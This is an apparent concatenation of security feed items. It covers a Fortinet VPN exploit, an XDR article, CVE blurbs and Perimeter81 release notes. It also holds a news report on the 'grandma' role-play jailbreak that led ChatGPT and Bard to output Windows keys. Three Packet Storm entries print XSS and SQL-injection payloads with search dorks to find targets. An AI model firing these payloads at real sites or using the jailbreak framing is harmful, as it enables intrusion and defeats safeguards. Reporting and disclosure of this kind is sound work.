Some 340,000 FortiGate SSL VPN appliances remain exposed to the threat more than three weeks after Fortinet released firmware updates to address the issue.

Researchers have written exploit code for a critical remote code execution (RCE) vulnerability in Fortinet's FortiGate SSL VPNs that the vendor disclosed and patched in June 2023.

Bishop Fox's research team, which developed the exploit, has estimated there are some 340,000 affected FortiGate devices that are currently unpatched against the flaw and remain open to attack. That number is significantly higher than the 250,000 FortiGate devices that several researchers estimated were vulnerable to exploit when Fortinet first disclosed the flaw on June 12.

**Code Not Released Publicly — but There's a GIF**

"There are 490,000 affected \[FortiGate\] SSL VPN interfaces exposed on the internet, and roughly 69% of them are currently unpatched," Bishop Fox's director of capability development, Caleb Gross, wrote in a blog post on June 30. "You should patch yours now."

The heap-based buffer overflow vulnerability, tracked as CVE-2023-27997, affects multiple versions of FortiOS and FortiProxy SSL-VPN software. It gives an unauthenticated, remote attacker a way to execute arbitrary code on an affected device and take complete control of it. Researchers from French cybersecurity firm Lexfo who discovered the flaw assessed it as affecting every single SSL VPN appliance running FortiOS.

Bishop Fox has not released its exploit code publicly. But its blog post has a GIF of it in use. Gross described the exploit that Bishop Fox has developed as giving attackers a way to open an interactive shell they could use to communicate with an affected FortiGate appliance.

"This exploit very closely follows the steps detailed in the original blog post by Lexfo, though we had to take a few extra steps that were not mentioned in that post," Gross wrote. "The exploit runs in approximately one second, which is significantly faster than the demo video on a 64-bit device shown by Lexfo."

Fortinet issued firmware updates that addressed the issue on June 12. At the time, the company said the flaw affected organizations in government, manufacturing and other critical infrastructure sectors. Fortinet said it was aware of an attacker exploiting the vulnerability in a limited number of cases.

Fortinet cautioned about the potential for threat actors like those behind the Volt Typhoon cyber-espionage campaign to abuse CVE-2023-27997. Volt Typhoon is a China-based group that is believed to have established persistent access on networks belonging to US telecom companies and other critical infrastructure organizations, for stealing sensitive data and carrying out other malicious actions. The campaign so far has primarily used another, older Fortinet flaw (CVE-2022-40684) for initial access. But organizations should not discount the possibility of Volt Typhoon — and other threat actors — using CVE-2023-27997 either, Fortinet warned.

**Why Security Appliances Make Popular Targets**

CVE-2023-27997 is one of numerous critical Fortinet vulnerabilities that have been exposed. Like that of almost every other firewall and VPN vendor, Fortinet's appliances are a popular target for adversaries because of the access they provide to enterprise networks.

The US Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and others have issued multiple advisories in recent years about the need for organizations to promptly address vulnerabilities in these and other network devices because of the high attacker interest in them.

In June 2022, for instance, CISA warned of China-sponsored threat actors actively targeting unpatched vulnerabilities in network devices from a wide range of vendors. The advisory included a list of the most common of these vulnerabilities. The list included vulnerabilities in products from Fortinet, Cisco, Citrix, Netgear, Pulse, QNAP, and Zyxel.

Systems administrators should patch as quickly as possible, even though patching firmware can be a bit more cumbersome when dealing with appliances that run application gateways, says Timothy Morris, chief security adviser at Tanium. Often, appliances such as those from Fortinet face the perimeter and have very high-availability requirements, meaning they have tight windows for change.

"For most organizations, a certain amount of downtime is probably inevitable," Morris says. Vulnerabilities such as CVE-2023-27997 require the full firmware image to be reloaded, so there is a certain amount of time and risk involved, he adds. "Configurations have to be backed up and restored to make sure they are working as expected."

Researchers Develop Exploit Code for Critical Fortinet VPN Bug

By Waqas
A Twitter user successfully utilized the "grandma exploit" to trick ChatGPT and acquire multiple Windows 10 codes.
This is a post from HackRead.com Read the original post: ChatGPT tricked into generating Windows 10 and Windows 11 keys

**The Twitter account of the user who managed to generate Windows activation keys on ChatGPT and Google Bard has been suspended.**

ChatGPT, the popular artificial intelligence (AI) chatbot, is at the centre of controversy as users uncover a potential security loophole. As one of the fastest-growing AI services globally, ChatGPT has gained immense popularity for its diverse functionalities. However, recent reports suggest that some users have managed to bypass certain safety measures, including the so-called “grandma” exploit.

The exploit involves leveraging ChatGPT’s capabilities to extract Windows 10 Pro keys. Astonishingly, one user successfully utilized the grandma exploit to obtain multiple Windows 10 codes, which were initially perceived as legitimate. Intrigued by this discovery, the user continued to request codes for upgrading from Windows 11 Home to Windows 11 Pro.

It all started on June 17th, 2023, when a Twitter user going by the handle of @immasiddtweets, (their Twitter account has been suspended now but here is the archived link to their now deleted tweets), claimed to have successfully generated Windows 10 Pro keys by engaging with OpenAI’s AI-powered chatbot, ChatGPT.

The user requested the chatbot to read out the keys as a way to reminisce about their deceased grandmother. Surprisingly, the chatbot responded compassionately and provided five unique Windows 10 Pro keys at no cost.

Out of curiosity, @immasiddtweets went a step further and showcased how they utilized Google Bard and ChatGPT to upgrade from Windows 11 Home to Windows 11 Pro. However, TechRadar revealed a crucial detail—the generated product keys were generic in nature.

Consequently, while it remains possible to install or upgrade Windows using these keys, users may encounter limitations and miss out on certain features available in the full Windows 11 experience.

ChatGPT and Google Bard AI generating Windows Keys for @immasiddtweets (Image: Hackread.com)

Here is a series of Tweets from users generating keys for Windows 10 and Windows 11:

*   1: “Worked on Bing too bruv, and said it so confident,” said one user while sharing a screenshot of the generated keys
*   2: ”So True,” tweeted a user with a screenshot of generated keys.
*   3: For some users, ChatGPT also generated API keys.
*   4: ”Bing fell into the trap,” said one tweet.

However, according to Windows Central, when their researchers headed to Microsoft’s Bing AI chatbot to generate Windows keys, the chatbot came up with no keys but offered words of wisdom about piracy and how such products should be bought from original sources.

Nevertheless, to ensure the integrity of their services, both ChatGPT and Google Bard have implemented robust measures to prevent users from generating unauthorized product keys. As users navigate the digital realm, it is vital to exercise caution and seek legitimate avenues for obtaining product keys, ensuring a genuine and uninterrupted Windows experience.

**RELATED ARTICLES**

1.  Europol warns of ChatGPT exploitation
2.  OpenAI ChatGPT Bug Bounty Program – Earn $200 to $20k
3.  DarkBERT: Enhancing Cybersecurity Efforts on the Dark Web
4.  100,000 Hacked ChatGPT Accounts Discovered on Dark Web
5.  ChatGPT’s False Information Generation Enables Code Malware

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

ChatGPT tricked into generating Windows 10 and Windows 11 keys

XDR can lower platform costs and improve detection, but it requires committing to a few principles that go against the established way of thinking about SOC.

The cyber security operation center (SOC) model's focus has shifted to extended detection and response (XDR). Architected correctly, XDR puts less pressure and cost on the security information and event management (SIEM) system to correlate complex security alerts. It also does a better job as a single pane of glass for ticketing, alerting, and orchestrating automation and response.

XDR is a real opportunity to lower platform costs and improve detection, but it requires committing to a few principles that go against the established way of thinking about SOCs.

**Intelligent Data Pipelines and Data Lakes Are a Necessity**

_**Takeaway: A security data pipeline can remove log waste prior to storage and route logs to the most appropriate location.**_

Managing your security data pipeline intelligently can have a massive impact on controlling spending by preprocessing every log and eliminating excess waste, especially when your primary cost driver is GB per day. Consider the following example showing the before and after size of Windows Active Directory (AD) logs.

    

The average inbound event had 75 fields and a size of 3.75KB. After removing redundant and unnecessary fields, the log has 30 fields and a size of 1.18KB. That is a 68.48% reduction of SIEM storage cost.

Applying similar value analysis for where you send each log is equally important. Not all logs should be sent to the SIEM! Only logs that drive a known detection should be sent to SIEM. All others used in supporting investigations, enrichment, and threat hunting should go to the security data lake. An intelligent data pipeline can make on-the-fly routing decisions for each log and further reduce your costs.

    

    

**Focus Detection and Prevention Closest to the Threat**

_**Takeaway: Product-native detections have gotten dramatically better; the SIEM should be a last line of defense.**_

The SIEM used to be one of the only tools that could correlate and analyze raw logs and identify alerts that need to be addressed. This was largely a reflection of other tools being single-purpose and generally bad at identifying issues by themselves. As a result, it made sense to ship everything to the SIEM and create complex correlation rules to sort the signal from the noise.

Today's landscape has changed with endpoint detection and response (EDR) tools. Modern EDR is essentially SIEM on the endpoint. It has the same capabilities to write detection rules on endpoints as the SIEM has, but now there is no need to ship every bit of telemetry data into the SIEM.

EDR vendors have gotten markedly better at building and maintaining out-of-the-box detections. We have consistently seen a sizable decrease in detections and preventions attributed to the SIEM during our purple team engagements in favor of tools like EDR and next-generation firewalls (NGFW). There are exceptions like Kerberoasting (which on-premises AD doesn't have much coverage for). As you move to pure cloud for AD, even those types of detections will be handled by "edge" tools like Microsoft Defender for Endpoint.

**Play to Your SIEM Strong Suit**

_**Takeaway: Having a deliberate process to consistently measure and improve your detection capabilities is far more valuable than having any specific SIEM tool on the market.**_

Purple teaming across industries and detection ecosystems has allowed us to understand the efficacy of many modern EDR, NGFW, SIEM, and other tools. We score and benchmark purple team results and trend the improvements over time. We have found over the past five years that the SIEM you buy has no measurable correlation to purple team scores. Process, tuning, and testing are what matter.

SIEM tools have architectural differences that can make one a better or worse fit for your environment, but buying a specific SIEM to significantly improve your detection capabilities will not prove out. Instead, focus your efforts on dashboards and correlations that support threat-hunt and incident-response efforts.

**Align EDR, SIEM, and SOAR in Your XDR Architecture**

_**Takeaway: Security automation and artificial intelligence (AI)-enhanced triage is the future but should be approached with caution. Not all automation needs to exclude all human involvement.**_

The future of XDR is coupled with tightly integrated security orchestration, automation, and response (SOAR) technologies. XDR concepts recognize that what really matters is **not how fast you can detect a threat, but how fast you can neutralize a threat.** _"If this – then that"_ SOAR automation methodologies aren't effective in real-world scenarios. One of the best approaches we've seen in XDR automation is:

*   Conduct a purple team exercise to identify which current detection events are optimized (very low false positive rates) and can be trusted with an automated response.
*   Create an automated response playbook but insert human intervention steps to gain confidence before you turn it fully over to automation. We call this "semi-automation," and it's a smart first step.

XDR is a buzzword, but when viewed in a technology-agnostic fashion, it is based on good foundations. Where organizations are most likely to fail is applying legacy SIEM management philosophies to modern XDR architectures. These program design philosophies will likely improve your capabilities and reduce your costs.

**About the Author**

    

Mike Pinch joined Security Risk Advisors in 2018 after serving 6 years as the Chief Information Security Officer at the University of Rochester Medical Center. Mike is nationally recognized as a leader in the field of cybersecurity, has spoken at conferences including HITRUST, H-ISAC, and has contributed to national standards for health care and public health sector cybersecurity frameworks. Mike focuses on GCP, AWS, and Azure security, primarily in helping SOC teams improve their capabilities. Mike is an active developer and is currently enjoying weaving modern AI technologies into common cybersecurity challenges.

Architecting XDR to Save Money and Your SOC's Sanity

Categories: News
A list of topics we covered in the week of June 26 to July 2 of 2023



(Read more...)




The post A week in security (June 26 - July 2) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows Antivirus

Mac Antivirus

Android Antivirus

Free Antivirus

VPN App (All Devices)

Malwarebytes for iOS

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

FOR PARTNERS

Managed Service Provider (MSP) Program

Resellers

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (June 26 - July 2)

Strawberry version 1.1.9 suffers from a cross site scripting vulnerability.

**Strawberry 1.1.9 Cross Site Scripting**

Posted Jul 2, 2023

Authored by indoushka

Strawberry version 1.1.9 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 5006ad4fe5ee6631967fbcda59c50822e4f6cf4db227a33b6f3fba8640dbb942

Download | Favorite | View

**Strawberry 1.1.9 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Strawberry 1.1.9 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : https://cutenewsru.sourceforge.io/strawberry/                                                                      |  | # Dork      : "Powered by Strawberry 1.1.9"                                                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /content/index.php/"onmouseover%3d'prompt(document.cookies)'bad%3d"[+] http://127.0.0.1/dverekomondoorcom/content/index.php/"onmouseover%3d'prompt(document.cookies)'bad%3d"Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |        =======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,554)
*   Arbitrary (16,117)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,203)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,328)
*   DoS (23,288)
*   Encryption (2,363)
*   Exploit (51,405)
*   File Inclusion (4,202)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,742)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,412)
*   Magazine (586)
*   Overflow (12,627)
*   Perl (1,423)
*   PHP (5,134)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,582)
*   Root (3,573)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,861)
*   Shell (3,168)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,254)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,654)
*   Web (9,600)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,787)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,782)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,065)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,707)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

Strawberry 1.1.9 Cross Site Scripting

phpFK version 9.2 Beta suffers from cross site scripting and remote SQL injection vulnerabilities.

**phpFK 9.2 Beta Cross Site Scripting / SQL Injection**

**phpFK 9.2 Beta Cross Site Scripting / SQL Injection**

Posted Jul 2, 2023

Authored by indoushka

phpFK version 9.2 Beta suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection

SHA-256 | 09fef1efe957f866ce2e4d01724c95e85523e37eb341c2135635c17435c8b42c

Download | Favorite | View

**phpFK 9.2 Beta Cross Site Scripting / SQL Injection**

    ====================================================================================================================================| # Title     : phpFK v9.2 Beta version SQLi + XSS Vulnerability                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0.(32-bit)                                              | | # Vendor    : https://www.frank-karau.de/demo-forum/                                                                             |  | # Dork      : Powered by: phpFK                                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /forum/thread.php?board=4&thema=349'"><svg/onload=prompt(/_indoushka_/);>{{7*7}}[+] http://127.0.0.1/forum/thread.php?board=4&thema=349%27%22%3E%3Csvg/onload=prompt(/_indoushka_/);%3E{{7*7}}Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,554)
*   Arbitrary (16,117)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,203)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,328)
*   DoS (23,288)
*   Encryption (2,363)
*   Exploit (51,405)
*   File Inclusion (4,202)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,742)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,412)
*   Magazine (586)
*   Overflow (12,627)
*   Perl (1,423)
*   PHP (5,134)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,582)
*   Root (3,573)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,861)
*   Shell (3,168)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,254)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,654)
*   Web (9,600)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,787)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,782)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,065)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,707)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

phpFK 9.2 Beta Cross Site Scripting / SQL Injection

ArabInfotech CMS version 2.0.1 suffers from a cross site scripting vulnerability.

**ArabInfotech CMS 2.0.1 Cross Site Scripting**

Posted Jul 2, 2023

Authored by indoushka

ArabInfotech CMS version 2.0.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 670bf364f2d7ff34656860436ff284c800f86d1d679b95be7803858c4d41549d

Download | Favorite | View

**ArabInfotech CMS 2.0.1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : ArabInfotech CMS v 2.0.1 L.L.C Xss Vulnerability                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : http://www.editpubdz.com/                                                                                          |  | # Dork      : intext:"Powered By Editpub"                                                                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload : '"()%26%25<acx><script>alert(/indoushka/);</script>[+] http://127.0.0.1/www/reliancerecruiterscom/job-details.php?id=68%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,554)
*   Arbitrary (16,117)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,203)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,328)
*   DoS (23,288)
*   Encryption (2,363)
*   Exploit (51,405)
*   File Inclusion (4,202)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,742)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,412)
*   Magazine (586)
*   Overflow (12,627)
*   Perl (1,423)
*   PHP (5,134)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,582)
*   Root (3,573)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,861)
*   Shell (3,168)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,254)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,654)
*   Web (9,600)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,787)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,782)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,065)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,707)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

ArabInfotech CMS 2.0.1 Cross Site Scripting

The MultiVendorX plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.5.7. This is due to missing or incorrect nonce validation on the submit_comment() function. This makes it possible for unauthenticated attackers to submit comments via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVE-2020-36741: class-wcmp-vendor-dashboard.php in dc-woocommerce-multi-vendor/tags/3.5.8/classes – WordPress Plugin Repository

com.perimeter81.osx.HelperTool in Perimeter81 10.0.0.19 on macOS allows Local Privilege Escalation (to root) via shell metacharacters in usingCAPath.

Share feedback

Thanks for sharing your feedback!

**MacOS agent 10.0.0.19**

**May 7th, 2023**

**New Features:**

*   The agent now supports the new Exclude configuration option for Split Tunneling (so that all traffic except specific addresses will go through the tunnel).

**Resolved Issues:**

*   P81-23365 - Mac agent launching twice, 2 different instances running at the same time
*   P81-26071 - OpenVPN connection sometimes taking too long

**MacOS agent 9.0.1.9**

**New Features:**

*   You can now switch between protocols while the agent is connected to a network! Simply select a protocol in the Protocols tab to switch to it.
*   When the user session expires (according to the session length set by the administrator), the agent will be automatically logged out during local night time, in order to avoid disconnections during the workday. This applies to session lengths of 2 days and above.

**Enhancements:**

*   Logging improvements
*   Agent installation will be prevented on unsupported MacOS version 10.14 and below

**Resolved Issues:**

*   P81-18590 - On macOS 13.0, sometimes the quick access UI and Full agent UI were displayed simultaneously when changing networks
*   P81-20543 - Incorrect icon state after silent upgrade of the agent
*   P81-23034 - Agent disconnection after OS upgrade to Mac OS 13.2
*   P81-23462 - SWG Web Filtering not working when a rule is set with two custom URLs that one is contained within the other
*   P81-7337 - Agent logs show that user is using macOS 10.16 when it is actually a higher version

**MacOS agent 9.0.0.28**

**New Features:**

*   Secure Web Gateway (SWG) now includes Malware Protection! SWG users now have an additional layer of protection against malicious software, on top of the existing web filtering functionality. Malware Protection actively scans content before it reaches the user's browser, blocks multiple types of threats, and notifies the user. Admins can view logs of blocked malware in a new page under the Monitor and Logs section.

**Enhancements:**

*   Log file size decreased, implemented log rotation
*   Added support for long-life certificates for SDP sessions
*   Updated internal frameworks to support minimum target OS of 10.15
*   Improved SWG module behaviour, increased reliability of Proxy module
*   Improved memory usage of agent and fixed issues with memory leaks
*   Improved stability
*   Improved connectivity

**Resolved Issues:**  
P81-21296 - Fixed an issue related to the Disable Sign-out feature  
P81-22039 - Fixed issue when agent UI was out of sync with Daemon  
P81-14902 - Fixed Trusted Wired Network MAC address case-insensitive comparison

**MacOS agent 8.0.6.166**

**Resolved Issues:**  
P81-16293 - Excessive memory consumption when using SWG

**MacOS agent 8.0.6.163**

**New Features:**

*   The agent can now remain connected while P81 SDP backend is restarted/offline, for better connection stability

**Enhancements:**

*   Added additional logging events on VPN reconnection and Probe failure
*   In the Protocols section, relabeled 'Automatic' protocol to 'Default'
*   Improved mechanism for fetching Public IP
*   Increased shared codebase between MacOS and iOS agents for better compatibility

**Resolved Issues:**  
P81-12527, P81-12562 - Unplanned disconnections  
P81-12869, P81-6732 - Sporadically cannot login to the agent - 'your session was not established'  
P81-14787 - Routing table not updated on Split Tunneling update until user disconnects  
P81-13988 - Agent User Interface is cut off when it’s the rightmost icon in the macOS tray  
P81-7450 - Fixed sorting in Quick Access networks list  
P81-14953 - Install update prompt appears without user interaction  
P81-16096, P81-16864 - DPC failed although conditions passed, until reboot  
P81-16189, P81-16949 - While connecting to VPN on unsecured WiFi, Internet is unavailable for 40-60 seconds

**MacOS agent 8.0.5.143**

**New Features:**

*   New wake from sleep mechanism logic
*   Added 'Quit' button to the agent's quick-UI for easier access
*   Added 'Reset Agent' button to the loading screen if it does not connect within 60 seconds
*   Added 'Reset Agent' button to the full UI (under the Support tab) to provide the ability to reset the agent at any time

**Resolved Issues:**

*   P81-14321 - Infinite connection attempts
*   P81-14317 - The loading screen does not disapear
*   P81-13962 - Agent says it's connected but loses all Internet connectivity
*   P81-13257 - Possible command injection vector via DPC
*   P81-13188 - DPC stuck after machine reboot
*   P81-12978 - Proxy communication issue
*   P81-12749 - Presented with a "You have reached your pre-configured connection time limit" error
*   P81-12698 - DPC: Device Activity Log does not appears in web console at admission time, only after DPC scheduled recheck time (20 minutes)
*   P81-12360 - Agent log files take too much space (0.4 GB)
*   P81-7128 - The Device Activity log shows 'No Hostname' instead of the device name
*   P81-6628 - The user is not signed out properly after the agent receives a new token

**MacOS agent 8.0.4.132**

**New Features:**

*   Disable Sign-Out (enforce Always On) - this feature is being gradually rolled out and will be available to all customers in a few weeks. Requires this version of the agent and above.
*   Agent sign-out brute-force prevention
*   Allow admins to control whether using the internal DNS is enforced or not, in order to support co-existing with products that require control over DNS

**Enhancements:**

*   Agent version is now displayed before login, for easier troubleshooting
*   The Quit button has been re-added to the agent extended UI, allowing users to shut down the agent application and the Perimeter 81 service in case they need to
*   P81-11453 - SWG bootstrap certificate enhancement

**Resolved Issues:**

*   P81-13378 - Changing settings on the console would cause the agent to Reconnect
*   P81-12977 - RegionName always showed N/A
*   P81-12747, P81-12674, P81-12571, P81-12525, P81-12164 - Issues connencting after sleep
*   P81-12746 - Connectivity issue when using SWG
*   P81-12417, P81-12618 - Connectivity issues
*   P81-12560 - Sign-in failing to open browser
*   P81-12539, P81-12519 - Websites unreachable
*   P81-12536 - SWG rules issues
*   P81-12461 - Internet connection issue after session timeout
*   P81-12419 - Reconnection process takes too long
*   P81-12269 - Public IP stuck in "Refreshing" and losing Internet connectivity
*   P81-11170, P81-11171, P81-12807 - Internal log fixes
*   P81-6859 - Silent Upgrade improvements
*   P81-6467 - UI bugs
*   P81-11531 - Better handling of ProtocolFilters in regards to certificates
*   P81-12720 - SWG bug fixes

**MacOS agent 8.0.4.124**

**Enhancements:**

*   Changed MTU for Wireguard to 1380 to improve connectivity in low-MTU scenarios
    
*   The Perimeter 81 certificate is now installed only if using Secure Web Gateway. If needed, users are referred to a webpage on how to complete the certificate and add-on setup
    
*   'Start Minimized' removed from Settings screen
    

**Resolved Issues:**

P81-11830/P81-10601 Connection is not restored after sleep  
P81-11673 Sometimes the app Signed Out incorrectly  
P81-11251/P81-11163 Agent stuck with connect button not responding  
P81-11211 DNS fails after sleep on latest Mac version (Monterey 12.3)  
P81-11074/P81-10889 Constant disconnections  
P81-11071 Connection issue with IKE protocol  
P81-11035/P81-11034/P81-8381Connection issue with Wireguard  
P81-11027/P81-11026/P81-10631 Internet connection blocked/unstable  
P81-10922/P81-10916 After sleep, the agent is connected but there is no internet connectivity  
P81-10874 Sign In button not working after session timeout  
P81-10556 Network adaptor changing every several minutes  
P81-9987 Split tunneling configuration didn't updated till Agent reconnection  
P81-9804 Client generates certificate errors  
P81-8032 "Connected to Network" notification doesn't hide automatically  
P81-7340 After upgrading XPC between Daemons, Proxy is not starting  
P81-6312/P81-3930 "Private DNS" icon not displayed on network with "Regional Private DNS"  
P81-6080 Closed Mac agent pops up every time Firewall rule is changed

**MacOS agent 8.0.4.116**

Fixed Issues:

*   P81-9839/P81-9833/P81-9795 - App crash
*   P81-9794/P81-9493 Connection issue - agent stuck in 'Reconnecting'
*   P81-9500 Failed to connect while returning from sleep mode
*   P81-9181 Agent takes a while to reconnect after sleep
*   P81-9152 Sign Out pop-up header displayed incorrectly
*   P81-8233 Device Activity Log - MacBook still appears as Healthy even though found Not Healthy
*   P81-8048 Apple M1 Pro - Disconnect during Zoom
*   P81-7340 SWG - Proxy not starting after upgrading XPC between Daemons
*   P81-5273 .pkg error - 'The Package is unsigned'
*   P81-910 .pkg installer file - Unsupported file format in MobileIron
*   P81-8236 Icons for Support, Settings, Sign Out are blurred

New features:

*   P81-9985 When installing using pkg file, the P81 certificate will not be installed unless specified by admin
*   P81-7551 The agent now allows admins to pre-populate the workspace value during installation via CLI.

**MacOS agent 8.0.4.108**

Fixed Issues:

*   P81-6326 - Failed to login after agent upgrade.
*   P81-4795 - DNS lost randomly when using split tunneling + custom DNS.
*   P81-7608 - IPv6 behavior is unpredictable.
*   P81-5029 - Improved messaging when pre-configured connection time limit is reached.
*   P81-2455 - agent UI pops up upon changing firewall rules.
*   P81-5034 - renamed 'diagnose issues' button to 'Send logs to support'.

New Features:

*   The Perimeter 81 agent now runs as a service in the background! There is no need to keep the agent UI open - it is always up and available via an icon in the system tray.
*   Connectivity and stability have been improved.
*   The agent now has a brand new “quick access” UI, which allows you to perform most operations from a single screen by clicking on the tray icon. The classic UI is still available, and can still be accessed in order to configure settings, contact support etc.
*   This agent version supports Secure Web Gateway (SWG).

**MacOS agent 7.0.3.37**

Fixed issues:

*   P81-2389 - Helper tool installation requires admin permissions
